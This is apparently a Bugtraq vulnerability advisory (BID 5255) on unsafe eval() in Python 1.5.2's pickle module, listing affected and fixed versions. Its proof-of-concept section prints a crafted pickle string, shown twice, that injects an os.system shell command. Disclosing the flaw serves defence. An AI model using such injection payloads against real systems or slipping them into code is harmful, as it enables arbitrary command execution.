Python Pickle Unsafe eval() Code Execution Vulnerability
BID:5255
Info
Python Pickle Unsafe eval() Code Execution Vulnerability
| Bugtraq ID: | 5255 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Unknown |
| Local: | Unknown |
| Published: | Jul 17 2002 12:00AM |
| Updated: | Jul 17 2002 12:00AM |
| Credit: | Published by Jeff Epler <[email protected]>. |
| Vulnerable: |
Python Software Foundation Python 1.5.2 |
| Not Vulnerable: |
Python Software Foundation Python 2.2.1 Python Software Foundation Python 2.2 Python Software Foundation Python 2.1.3 Python Software Foundation Python 2.1.2 Python Software Foundation Python 2.1.1 Python Software Foundation Python 2.1 Python Software Foundation Python 2.0.1 Python Software Foundation Python 2.0 Python Software Foundation Python 1.6.1 Python Software Foundation Python 1.6 |
Exploit / POC
Python Pickle Unsafe eval() Code Execution Vulnerability
The following sample pickle string is provided by Jeff Epler <[email protected]>:
"S''*__import__('os').system('echo 0wn3d')\np0\n."
The following sample pickle string is provided by Jeff Epler <[email protected]>:
"S''*__import__('os').system('echo 0wn3d')\np0\n."